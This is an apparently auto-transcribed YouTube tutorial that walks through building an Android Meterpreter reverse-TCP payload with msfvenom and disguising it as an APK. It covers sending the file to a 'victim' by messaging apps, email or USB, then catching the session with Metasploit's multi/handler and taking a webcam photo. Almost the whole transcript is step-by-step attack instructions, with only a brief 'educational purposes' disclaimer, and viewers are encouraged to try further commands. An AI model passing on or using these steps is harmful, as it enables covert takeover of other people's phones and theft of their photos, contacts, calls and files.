YouTube. In today's video we are going to learn that how we can create a payload for an Android machine, and we are going to send it to the Android device of the victim. And when the victim is going to open that file, we are going to get a remote access to the device, and we can use many commands, and we can execute many commands to operate that Android remotely from this computer. So in order to do that, you have to open your Kali Linux, the operating system, and in that open the terminal. So after that, you have to type sudo su for the root permissions, given give the password. And now we are in root, so type msf venom hyphen p android meter breeder reverse underscore tcp lhost followed by the internet of the followed by the IP address of the internet to which your Kali machine is connected. In order to find it, you have to connect your internet to the Kali machine, and in a new tab give command ifconfig, and after wlan 0 are going in second line, you can find the IP address. You have to just copy it and paste it in front of lhost. So after that, we are going to assign the value or the port number. So in my case I wrote 8484, and after that you have to give the current location, that where are you uh, now on this machine. So we are in home on Kali. After that, give the name of the file, so we named it gummyware.apk. Hit enter. And like always, I'm telling you that this video is also made for educational purposes only, and I did not make it for illegal activity and with not an ill intent. So I request you that you must also be a positive hacker, like ethical hackers, not a black hat hacker. So now you can see that payload is created, and this total size of it is 10,188 bytes. So now we have to send this payload to the Android. There are several ways to do that. You can even host a website, you can use Gmail, Google Drive, Cloud Drive, WhatsApp. But in my case, I am using a USB cable, and I connect it to my PC. I'm going to connect it with my PC, and uh, so it is already connected, and we have to just copy this file. And in the mobile, I'm going to copy it in the SD card, paste into the folder. So replace all, and now done. So I'm not going to show the screen of my mobile, but I'm going to tell that what am I doing. So open files and go to SD card and select the gummybear.apk. So it is saying, do you want to install this application? It will get access to modify system settings, take pictures and videos, modify contacts, read your contacts, record audio, directly call phone numbers, read call logs, read phone status, identity identity read call logs. And this is insane. So and now we have to press next and then install. So now it is installing it, and uh, you have to not open it, but you have to press done. So now we have to type msf console. So you can see it is going to take a lot of time, because it is a widely used universal application which is widely used by black hat hackers to gain the information of other people's, and because it covers all the aspects of hacking. So that's why you can see it is taking a lot of time, unlike other applications. So now we are going to type use exploit use exploit forward slash multi forward slash handler. Hit enter. Now type set payload. So what is a payload? A payload is the actual data, remember. So payload is the actual data of the application. So set payload android forward slash meter breeder forward slash reverse underscore tcp, not a hyphen but a tc underscore after before tcp. Hit enter, and now you have to write set caps on l host. Now go back to the tab, copy the IP, and you have to paste it in front of lhost. After that, set caps on l port 8484. After that, write set options. Oh, I mean show options. Human error. So now you can see that the L host is 192.168.100.6 and L port is 8484. So now we are going to say set exit on session, and we have to make it false. After that, type exploit space hyphen j, and now it is saying exploit running as background job 0, exploit completed but no session was created, started reverse TCP handler on 192.168.100.68484. So now we have to open that file or the application on a mobile. So I open it, and now you can see that it is saying ascending stages, and now meter repeater session 1 opened. So after that we are going to type sessions hyphen I. We wrote hyphen I for the information, and in the information, in the active sessions, we are having only one active session, and in order to open it we are going to type sessions space hyphen I1. So it started the interaction with hyphen 1, and now we can give commands. There are many commands to gather the information from that Android machine. So to see that commands, we have to type help, and now you can see that there are many commands to operate the Android. Like there are core commands, and after the command the description of those commands is also given, like help for the help menu, and run to execute a meter repeater script or post a module. Then there are file system commands as well, like checksum, retrieve the checksum of a file, which is an error checking method. And then the most interesting part is networking commands, like ifconfig, ipconfig, port forwarding, root. Then system commands to execute a command, local time, or sysinfo. Sysinfo is the short form of system information, and this is a command, and description is gets information about the remote system such as an OS, and in this case the OS is Android. Then there are some user interface commands, like a screen share to watch the remote user's desktop in real time, screenshots, and webcam commands. And this is the real part of this activity. So there are many others, so let's try this by saying a webcam snap. So uh, let's type webcam underscore snap, and let's take the picture of this mouse. So I'm going to hit enter, and I placed my mobile's camera on the mouse. So it is so now after taking the picture, it gave us a path that the picture is stored here on the files. We have to copy it, and but you can see that the picture is here. You have to just open it, and since I'm opening it with Firefox, it is going to take a time, a minute or so. So you can see that this is my mouse. So but I'm not going to execute and demonstrate other commands because this is not ethical, and but you can try those commands at your own. So this was our video, and I hope it was interesting and you people enjoyed it. So for that, hit the subscribe button. That means a lot for me, and please do share it, leave a comment, a positive comment of course, and uh, like. So thanks, and see you in my next video.